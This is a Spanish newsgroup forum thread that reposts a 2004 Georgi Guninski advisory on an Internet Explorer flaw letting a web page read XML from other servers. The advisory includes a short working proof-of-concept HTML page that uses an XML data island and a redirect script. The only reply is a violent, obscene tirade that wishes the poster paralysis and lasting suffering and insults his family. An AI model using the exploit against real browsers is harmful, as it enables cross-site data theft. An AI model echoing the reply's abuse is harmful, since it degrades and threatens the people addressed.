Yet another IE aperture

08/10/2004 - 19:46 por Memmito | Informe spam

Georgi Guninski security advisory #71, 2004

Yet another IE aperture

Systems affected:
tested on patched IE on win2k and xp

Date: 7 October 2004

Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may not modify it and distribute it or distribute
parts of it without the author's written permission - this especially
applies to so called "vulnerabilities databases" and securityfocus,
microsoft, cert and mitre.
If you want to link to this content use
the URL:
http://www.guninski.com/where_do_yo...day_1.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true
though
it may be false.
The opinions expressed in this advisory and program are my
own and not of any company. The usual standard
disclaimer applies, especially the fact that Georgi Guninski is
not liable for any damages caused by direct or indirect use
of the information or functionality provided by this advisory
or program. Georgi Guninski bears no responsibility for
content or misuse of this advisory or program or any
derivatives thereof.

Description:

By opening html in IE it is possible to read at least well formed xml
from arbitrary servers. The info then may be transmitted.

Details:

Consider this:

<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>

<body onload="f()">
<script id="x1" language="xml"
src="/cgi-bin/redir.pl"></script>
<h1>
Copyright Georgi Guninski <br />
Cannot be used in any database
</h1>
</body>
</html>

redir.pl does a http redirect.

Georgi Guninski
http://www.guninski.com
http://www.guninski.com/where_do_yo...day_1.html

Siga el debate

1 respuesta

Tengo una respuesta

DRAGON AGE™: INQUISITION – Matadragones

Leer las respuestas

#1 Nennito

09/10/2004 - 13:16 | Informe spam

"Memmito" escribió en el mensaje
news:15l3zevud9obx$

Georgi Guninski security advisory #71, 2004

Yet another IE aperture

Systems affected:
tested on patched IE on win2k and xp

Date: 7 October 2004

!!! ME CAGO Y ME MEO EN EL ESPÍRITU SANTO EN LA BOCA DE TÚ PUTREFACTA MADRE
Y EN TODA TÚ MIERDA DE FAMILIA !!!

!!! QUE OJALÁ QUEDES TETRAPLÉGICO DE UN ACCIDENTTE DE TRÁFICO, Y QUE PASES
LARGOS AÑOS EN UNA CAMA LLENO DE TUBOS, SUFRIÉNDO LOS DOLORES MÁS
INSOPORTABLES Y CAGÁNDO CONTINUAMENTE HECES LÍQUIDAS POR TÚ PUTREFACTO CULO
ME CAGO Y ME MEO EN DIOS SÓ ESCORIA DE MIERDA PUTREFACTA !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA EN TODOS LOS SANTOS
Y EN EL ESPÍRITU SANTO !!!

!!! SO MEMO DE MIERDA ME CAGO Y ME MEO EN LA BOCA DE TÚ PUTREFACTA MADRE, EN
TODA TÚ MIERDA DE FAMILIA PUTREFACTA, Y EN TODOS TÚS CADÁVERES !!!

Acabando con los spamers se acaba con el spam.

Denuncia a los Spamers redireccionando sus mensajes
con propiedades a la administraciones correspondientes.

Incumplimiento LSSI --> info arroba mcyt.es
Software Pirata --> webmaster arroba bsa.org
Delitos Informáticos --> delitos.tecnologicos arroba policia.es
Delitos Informáticos --> uco-delitoinformatico arroba guardiacivil.es
Pornografia Infantil --> denuncias.pornografia.infantil arroba policia.es
Pornografia Infantil --> uco-denunciapedofilia arroba guardiacivil.es
Porn. Inf. Internac. --> children arroba interpol.int

************************

Estaría dispuesto a uno de mís ojos donar
sí mi grave enfermedad mental
por un cáncer o lo que ahora llaman sida pudiera cambiar.
* Nennito *

IP Fija: 80.34.155.11

Leer las otras respuestas

Preguntas similares

Diccionaries are not good enough yet.

Busqueda sugerida :